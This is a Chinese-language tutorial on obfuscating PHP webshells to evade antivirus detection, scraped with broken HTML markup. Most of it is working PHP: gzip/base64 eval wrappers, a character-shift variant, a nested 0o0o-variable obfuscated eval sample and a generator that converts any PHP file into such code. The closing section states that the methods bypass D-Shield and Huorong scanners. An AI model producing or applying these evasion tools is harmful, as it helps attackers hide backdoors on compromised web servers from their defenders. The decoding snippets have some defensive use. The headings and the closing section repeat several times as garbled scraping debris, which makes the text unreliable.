WebShell加密免杀技术研究<\/h1>

一、基础WebShell加密技术<\/h2>

1. Gzip+Base64基础加密<\/h3>

加密原理<\/h4>

使用gzdeflate<\/code>函数压缩PHP代码<\/li>
使用base64_encode<\/code>进行Base64编码<\/li>

最终通过eval(gzinflate(base64_decode()))<\/code>执行<\/li>
<\/ul>
加密实现代码<\/h4>
<?<\/span>php<\/span>
<\/span><\/span>function<\/span> encode_file_contents<\/span>($filename) {
<\/span><\/span>    $type =<\/span> strtolower<\/span>(substr<\/span>(strrchr<\/span>($filename, '.'<\/span>), 1<\/span>));
<\/span><\/span>    if<\/span> ('php'<\/span> ==<\/span> $type &&<\/span> is_file<\/span>($filename) &&<\/span> is_writable<\/span>($filename)) {
<\/span><\/span>        $contents =<\/span> php_strip_whitespace<\/span>($filename);
<\/span><\/span>        $headerPos =<\/span> strpos<\/span>($contents, '<?php'<\/span>);
<\/span><\/span>        $footerPos =<\/span> strrpos<\/span>($contents, '?>'<\/span>);
<\/span><\/span>        $contents =<\/span> substr<\/span>($contents, $headerPos +<\/span> 5<\/span>, $footerPos -<\/span> $headerPos);
<\/span><\/span>        $encode =<\/span> base64_encode<\/span>(gzdeflate<\/span>($contents));
<\/span><\/span>        $encode =<\/span> '<?php'<\/span> .<\/span> "<\/span>\n<\/span> eval(gzinflate(base64_decode('"<\/span> .<\/span> $encode .<\/span> "'))); <\/span>\n<\/span> ?>"<\/span>;
<\/span><\/span>        return<\/span> file_put_contents<\/span>($filename, $encode);
<\/span><\/span>    }
<\/span><\/span>    return<\/span> false<\/span>;
<\/span><\/span>}
<\/span><\/span>$filename =<\/span> 'phpinfo.php'<\/span>;
<\/span><\/span>encode_file_contents<\/span>($filename);
<\/span><\/span>?><\/span>
<\/span><\/span><\/span><\/code><\/pre>解密方法<\/h4>
<?<\/span>php<\/span>
<\/span><\/span>$a =<\/span> "eval(gzinflate(base64_decode('40pNzshXKMgoyMxLy9fQtFawtwMA')));"<\/span>;
<\/span><\/span>function<\/span> decodephp<\/span>($a) {
<\/span><\/span>    $max_level =<\/span> 300<\/span>;
<\/span><\/span>    for<\/span>($i =<\/span> 0<\/span>; $i <<\/span> $max_level; $i++<\/span>) {
<\/span><\/span>        ob_start<\/span>();
<\/span><\/span>        eval<\/span>(str_replace<\/span>('eval'<\/span>, 'echo'<\/span>, $a));
<\/span><\/span>        $a =<\/span> ob_get_clean<\/span>();
<\/span><\/span>        if<\/span>(strpos<\/span>($a, 'eval(gzinflate(base64_decode'<\/span>) ===<\/span> false<\/span>) {
<\/span><\/span>            return<\/span> $a;
<\/span><\/span>        }
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span>echo<\/span> htmlspecialchars<\/span>(decodephp<\/span>($a));
<\/span><\/span>?><\/span>
<\/span><\/span><\/span><\/code><\/pre>2. 高级Gzip+Base64加密<\/h3>
加密原理<\/h4>

在基础加密上增加字符位移操作<\/li>
每个字符ASCII码减1进行二次混淆<\/li>
<\/ul>
加密实现代码<\/h4>
<?<\/span>php<\/span>
<\/span><\/span>function<\/span> iJG<\/span>($BHM) {
<\/span><\/span>    $BHM =<\/span> gzinflate<\/span>(base64_decode<\/span>($BHM));
<\/span><\/span>    for<\/span>($i =<\/span> 0<\/span>; $i <<\/span> strlen<\/span>($BHM); $i++<\/span>) {
<\/span><\/span>        $BHM[$i] =<\/span> chr<\/span>(ord<\/span>($BHM[$i]) -<\/span> 1<\/span>);
<\/span><\/span>    }
<\/span><\/span>    return<\/span> $BHM;
<\/span><\/span>}
<\/span><\/span>eval<\/span>(iJG<\/span>("U1QEAm4QkVaelKupmhAYEBIao1yYVFJSUVCcqhynZcPtYA8A"<\/span>));
<\/span><\/span>?><\/span>
<\/span><\/span><\/span><\/code><\/pre>解密方法<\/h4>
<?<\/span>php<\/span>
<\/span><\/span>function<\/span> iJG<\/span>($BHM) {
<\/span><\/span>    $BHM =<\/span> gzinflate<\/span>(base64_decode<\/span>($BHM));
<\/span><\/span>    for<\/span>($i =<\/span> 0<\/span>; $i <<\/span> strlen<\/span>($BHM); $i++<\/span>) {
<\/span><\/span>        $BHM[$i] =<\/span> chr<\/span>(ord<\/span>($BHM[$i]) -<\/span> 1<\/span>);
<\/span><\/span>    }
<\/span><\/span>    return<\/span> $BHM;
<\/span><\/span>}
<\/span><\/span>echo<\/span>(iJG<\/span>("U1QEAm4QkVaelKupmhAYEBIao1yYVFJSUVCcqhynZcPtYA8A"<\/span>));
<\/span><\/span>?><\/span>
<\/span><\/span><\/span><\/code><\/pre>二、0o0o嵌套混淆技术<\/h2>
1. 复杂嵌套混淆示例<\/h3>
加密代码<\/h4>
<?<\/span>php<\/span>
<\/span><\/span>$O00OO0 =<\/span> urldecode<\/span>("%6E1%7A%62%2F%6D%615%5C%76%740%6928%2D%70%78%75%71%79%2A6%6C%72%6B%64%679%5F%65%68%63%73%77%6F4%2B%6637%6A"<\/span>);
<\/span><\/span>$O00O0O =<\/span> $O00OO0[3<\/span>].<\/span>$O00OO0[6<\/span>].<\/span>$O00OO0[33<\/span>].<\/span>$O00OO0[30<\/span>];
<\/span><\/span>$O0OO00 =<\/span> $O00OO0[33<\/span>].<\/span>$O00OO0[10<\/span>].<\/span>$O00OO0[24<\/span>].<\/span>$O00OO0[10<\/span>].<\/span>$O00OO0[24<\/span>];
<\/span><\/span>$OO0O00 =<\/span> $O0OO00[0<\/span>].<\/span>$O00OO0[18<\/span>].<\/span>$O00OO0[3<\/span>].<\/span>$O0OO00[0<\/span>].<\/span>$O0OO00[1<\/span>].<\/span>$O00OO0[24<\/span>];
<\/span><\/span>$OO0000 =<\/span> $O00OO0[7<\/span>].<\/span>$O00OO0[13<\/span>];
<\/span><\/span>$O00O0O .=<\/span> $O00OO0[22<\/span>].<\/span>$O00OO0[36<\/span>].<\/span>$O00OO0[29<\/span>].<\/span>$O00OO0[26<\/span>].<\/span>$O00OO0[30<\/span>].<\/span>$O00OO0[32<\/span>].<\/span>$O00OO0[35<\/span>].<\/span>$O00OO0[26<\/span>].<\/span>$O00OO0[30<\/span>];
<\/span><\/span>eval<\/span>($O00O0O("JE8wTzAwMD0iU0VCb1d4VGJ2SGhRTnFqeW5JUk1jbWxBS1lrWnVmVkpVQ2llYUxkc3J0Z3dGWER6cEdPUFdMY3NrZXpxUnJBVUtCU2hQREdZTUZOT25FYmp0d1pwYVZRZEh5Z0NJdnhUSmZYdW9pbWw3N3QvbFg5VEhyT0tWRlpTSGk4eE1pQVRIazVGcWh4b21UMG5sdTQ9IjtldmFsKCc\/PicuJE8wME8wTygkTzBPTzAwKCRPTzBPMDAoJE8wTzAwMCwkT08wMDAwKjIpLCRPTzBPMDAoJE8wTzAwMCwkT08wMDAwLCRPTzAwMDApLCRPTzBPMDAoJE8wTzAwMCwwLCRPTzAwMDApKSkpOw=="<\/span>));
<\/span><\/span>?><\/span>
<\/span><\/span><\/span><\/code><\/pre>解密步骤<\/h4>

首先输出关键函数名：<\/li>
<\/ol>
echo<\/span> $O00O0O;
<\/span><\/span><\/code><\/pre>
然后输出第二层混淆代码：<\/li>
<\/ol>
$a =<\/span> ($O00O0O("JE8wTzAwMD0iU0VCb1d4VGJ2SGhRTnFqeW5JUk1jbWxBS1lrWnVmVkpVQ2llYUxkc3J0Z3dGWER6cEdPUFdMY3NrZXpxUnJBVUtCU2hQREdZTUZOT25FYmp0d1pwYVZRZEh5Z0NJdnhUSmZYdW9pbWw3N3QvbFg5VEhyT0tWRlpTSGk4eE1pQVRIazVGcWh4b21UMG5sdTQ9IjtldmFsKCc\/PicuJE8wME8wTygkTzBPTzAwKCRPTzBPMDAoJE8wTzAwMCwkT08wMDAwKjIpLCRPTzBPMDAoJE8wTzAwMCwkT08wMDAwLCRPTzAwMDApLCRPTzBPMDAoJE8wTzAwMCwwLCRPTzAwMDApKSkpOw=="<\/span>));
<\/span><\/span>echo<\/span> $a;
<\/span><\/span><\/code><\/pre>
将输出的第二层代码中的eval替换为echo：<\/li>
<\/ol>
$O0O000 =<\/span> "SEBoWxTbvHhQNqjynIRMcmlAKYkZufVJUCieaLdsrtgwFXDzpGOPWLcskezqRrAUKBShPDGYMFNOnEbjtwZpaVQdHygCIvxTJfXuoiml77t\/lX9THrOKVFZSHi8xMiATHk5FqhxomT0nlu4="<\/span>;
<\/span><\/span>echo<\/span> htmlspecialchars<\/span>('?>'<\/span>.<\/span>$O00O0O($O0OO00($OO0O00($O0O000,$OO0000*<\/span>2<\/span>),$OO0O00($O0O000,$OO0000,$OO0000),$OO0O00($O0O000,0<\/span>,$OO0000))));
<\/span><\/span><\/code><\/pre>2. 0o0o混淆生成器<\/h3>
实现代码<\/h4>
<?<\/span>php<\/span>
<\/span><\/span>function<\/span> RandAbc<\/span>($length =<\/span> ""<\/span>){
<\/span><\/span>    $str =<\/span> "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"<\/span>;
<\/span><\/span>    return<\/span> str_shuffle<\/span>($str);
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>$filename =<\/span> 'phpinfo.php'<\/span>;
<\/span><\/span>$T_k1 =<\/span> RandAbc<\/span>();
<\/span><\/span>$T_k2 =<\/span> RandAbc<\/span>();
<\/span><\/span>$vstr =<\/span> file_get_contents<\/span>($filename);
<\/span><\/span>$v1 =<\/span> base64_encode<\/span>($vstr);
<\/span><\/span>$c =<\/span> strtr<\/span>($v1, $T_k1, $T_k2);
<\/span><\/span>$c =<\/span> $T_k1 .<\/span> $T_k2 .<\/span> $c;
<\/span><\/span>
<\/span><\/span>$q1 =<\/span> "O00O0O"<\/span>;
<\/span><\/span>$q2 =<\/span> "O0O000"<\/span>;
<\/span><\/span>$q3 =<\/span> "O0OO00"<\/span>;
<\/span><\/span>$q4 =<\/span> "OO0O00"<\/span>;
<\/span><\/span>$q5 =<\/span> "OO0000"<\/span>;
<\/span><\/span>$q6 =<\/span> "O00OO0"<\/span>;
<\/span><\/span>
<\/span><\/span>$s =<\/span> '$'<\/span>.<\/span>$q6.<\/span>'=urldecode("%6E1%7A%62%2F%6D%615%5C%76%740%6928%2D%70%78%75%71%79%2A6%6C%72%6B%64%679%5F%65%68%63%73%77%6F4%2B%6637%6A");$'<\/span>.<\/span>$q1.<\/span>'=$'<\/span>.<\/span>$q6.<\/span>'{3}.$'<\/span>.<\/span>$q6.<\/span>'{6}.$'<\/span>.<\/span>$q6.<\/span>'{33}.$'<\/span>.<\/span>$q6.<\/span>'{30};$'<\/span>.<\/span>$q3.<\/span>'=$'<\/span>.<\/span>$q6.<\/span>'{33}.$'<\/span>.<\/span>$q6.<\/span>'{10}.$'<\/span>.<\/span>$q6.<\/span>'{24}.$'<\/span>.<\/span>$q6.<\/span>'{10}.$'<\/span>.<\/span>$q6.<\/span>'{24};$'<\/span>.<\/span>$q4.<\/span>'=$'<\/span>.<\/span>$q3.<\/span>'{0}.$'<\/span>.<\/span>$q6.<\/span>'{18}.$'<\/span>.<\/span>$q6.<\/span>'{3}.$'<\/span>.<\/span>$q3.<\/span>'{0}.$'<\/span>.<\/span>$q3.<\/span>'{1}.$'<\/span>.<\/span>$q6.<\/span>'{24};$'<\/span>.<\/span>$q5.<\/span>'=$'<\/span>.<\/span>$q6.<\/span>'{7}.$'<\/span>.<\/span>$q6.<\/span>'{13};$'<\/span>.<\/span>$q1.<\/span>'.=$'<\/span>.<\/span>$q6.<\/span>'{22}.$'<\/span>.<\/span>$q6.<\/span>'{36}.$'<\/span>.<\/span>$q6.<\/span>'{29}.$'<\/span>.<\/span>$q6.<\/span>'{26}.$'<\/span>.<\/span>$q6.<\/span>'{30}.$'<\/span>.<\/span>$q6.<\/span>'{32}.$'<\/span>.<\/span>$q6.<\/span>'{35}.$'<\/span>.<\/span>$q6.<\/span>'{26}.$'<\/span>.<\/span>$q6.<\/span>'{30};eval($'<\/span>.<\/span>$q1.<\/span>'("'<\/span>.<\/span>base64_encode<\/span>('$'<\/span>.<\/span>$q2.<\/span>'="'<\/span>.<\/span>$c.<\/span>'";eval($'<\/span>.<\/span>$q1.<\/span>'($'<\/span>.<\/span>$q3.<\/span>'($'<\/span>.<\/span>$q4.<\/span>'($'<\/span>.<\/span>$q2.<\/span>',$'<\/span>.<\/span>$q5.<\/span>'*2),$'<\/span>.<\/span>$q4.<\/span>'($'<\/span>.<\/span>$q2.<\/span>',$'<\/span>.<\/span>$q5.<\/span>',$'<\/span>.<\/span>$q5.<\/span>'),$'<\/span>.<\/span>$q4.<\/span>'($'<\/span>.<\/span>$q2.<\/span>',0,$'<\/span>.<\/span>$q5.<\/span>'))));'<\/span>).<\/span>'"));'<\/span>;
<\/span><\/span>
<\/span><\/span>$s =<\/span> '<?php '<\/span> .<\/span> $s .<\/span> ' ?>'<\/span>;
<\/span><\/span>echo<\/span> $s;
<\/span><\/span>
<\/span><\/span>$fpp1 =<\/span> fopen<\/span>('temp'<\/span> .<\/span> $filename, 'w'<\/span>);
<\/span><\/span>fwrite<\/span>($fpp1, $s) or<\/span> die<\/span>('写文件错误'<\/span>);
<\/span><\/span>?><\/span>
<\/span><\/span><\/span><\/code><\/pre>密钥作用<\/h4>

T_k1<\/code>：原始字母表<\/li>
T_k2<\/code>：替换后的字母表，形成一一对应的替换规则<\/li>
<\/ul>
三、免杀效果验证<\/h2>
经测试，上述加密方法能够绕过D盾和火绒杀毒软件的检测。<\/p>

WebShell加密免杀技术研究<\/h1>

一、基础WebShell加密技术<\/h2>

1. Gzip+Base64基础加密<\/h3>

2. 高级Gzip+Base64加密<\/h3>

二、0o0o嵌套混淆技术<\/h2>

1. 复杂嵌套混淆示例<\/h3>

2. 0o0o混淆生成器<\/h3>

密钥作用<\/h4> T_k1<\/code>：原始字母表<\/li> T_k2<\/code>：替换后的字母表，形成一一对应的替换规则<\/li> <\/ul> 三、免杀效果验证<\/h2> 经测试，上述加密方法能够绕过D盾和火绒杀毒软件的检测。<\/p>

三、免杀效果验证<\/h2> 经测试，上述加密方法能够绕过D盾和火绒杀毒软件的检测。<\/p>

密钥作用<\/h4>

`T_k1<\/code>：原始字母表<\/li>`
`T_k2<\/code>：替换后的字母表，形成一一对应的替换规则<\/li> <\/ul> 三、免杀效果验证<\/h2> 经测试，上述加密方法能够绕过D盾和火绒杀毒软件的检测。<\/p>`

三、免杀效果验证<\/h2>
经测试，上述加密方法能够绕过D盾和火绒杀毒软件的检测。<\/p>